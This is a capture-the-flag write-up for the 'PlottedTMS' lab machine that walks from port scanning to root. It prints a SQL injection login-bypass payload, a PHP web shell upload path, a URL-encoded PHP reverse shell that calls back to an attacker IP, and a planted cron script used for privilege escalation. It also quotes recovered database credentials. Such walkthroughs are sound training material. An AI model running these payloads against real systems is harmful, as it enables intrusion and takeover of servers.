PlottedTMS

Target IP: 10.10.22.19

Everything here is plotted! Enumeration is key!


Scanning

75514593b5d3422b980ca6c74326b22c.png
9a6b3435fb5a88a8f5f0dedfaa402d2f.png
There are three TCP ports open on the target machine: SSH on 22, HTTP on 80, and another HTTP on 445.


Enumeration

Port 445: HTTP
26957cdfaa5786f9b37af32c63effeff.png
Doing a directory search against this port shows the interesting directory /management, as shown above.

3f165810d23176851d9a90fa022ffc15.png
The webpage of /management is shown above. I do not have the credentials. I did try default credentials, such as admin:admin but it did not work.

259123508023ea680a86b452254f659b.png
However, this website is vulnerable to SQL injection. Using the payload admin' OR '1'='1' -- // as the input for the username, I bypassed the authentication mechanism. Now I have access to the web application on this port as the user admin.

65b58f450c3dd325a504b755bb09a885.png
The User List feature can be used to change the user account details. I noticed the picture of the admin user can be changed to anything, as all file types are supported including PHP!

dc5db3b859f9d14a4119c9d8e52e4f3c.png
I created a simple PHP web shell and changed the avatar picture of the user admin to this web shell shell.php. This uploaded successfully, but where is my shell?

bf9ea5c401ce7964f050a964239fca37.png
I found the location of my uploaded web shell while doing a source-code review. It was uploaded at /management/uploads with the file name as 1691847900_shell.php.

23d9c4baf6929c4ed0893878181d14ae.png
And bingo! Sending the payload id;whoami, I received the output above. Time to upgrade this to a reverse shell connection!


Exploitation

28441320b16d4f6fbf1894f8631e1369.png
Since the target machine is already using PHP, I can use a PHP reverse shell script. The PHP reverse shell script with URL encoding I used is php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8444%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27.
I started a listener on port 8444 and deployed the payload. Then I received a reverse shell connection on port 8444! Now I have a foothold on the target machine.
The full URL with PHP payload: http://10.10.22.19:445/management/uploads/1691847900_shell.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8444%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27


Privilege Escalation

978be86283bfc196222aa6a7406daab6.png
The initialize.php contains the credential tms_user:Password@123 for the database application.

5aff741b70d291e0fcc145bd44789f90.png
After running the command find / -perm -u=s 2>/dev/null, I notice an interesting binary /usr/bin/doas. After enumerating this binary more, I notice the user plot_admin can run the command openssl with root privileges without entering password. Now I need to escalate my privileges to this user.

87feaa9b002cfdad502ac5e3203924fd.png
Using the credentials tms_user:Password@123, I gained access to the MySQL application on the target machine. There is a database called tms_db with an interesting table called users. This table contains the two entries above. Is the puser the plot_admin?

f3fc882d2983e994a50cf35cfd62fd86.png
I cracked the password hash 1254737c076cf867dc53d60a0364f38e using crackstation. This gave me the password jsmith123, as shown above. However, this password did not work against the user plot_admin.

067444e70dea9e1eecc937e4f0e15153.png
5aabef92a00409df8b908ac34a03b9f0.png
After some more enumeration, I found an interesting cronjob that is executed by plot_admin user. I cannot modify the script itself; however, I can modify the contents of the directory which the script is at.

194575a3dc8267e37cb33f320cb87ba8.png
I renamed the original backup.sh to backup_old.sh. Then I inserted my reverse shell script inside the backup.sh and changed its permission to 777 so it can be executable. I started a listener on 8445, and after some time I got a connection back with the session as plot_admin!

b0749f1776519deae0081c92b11313c6.png
From previous enumeration, I found the binary doas. I used this to read the root.txt flag. GG.


Flags

c78a92f11f775336174986d27d37d2da.png
The user.txt flag.

3e281807e4d8d7775eca70bc0a8dd1d4.png
The root.txt hash.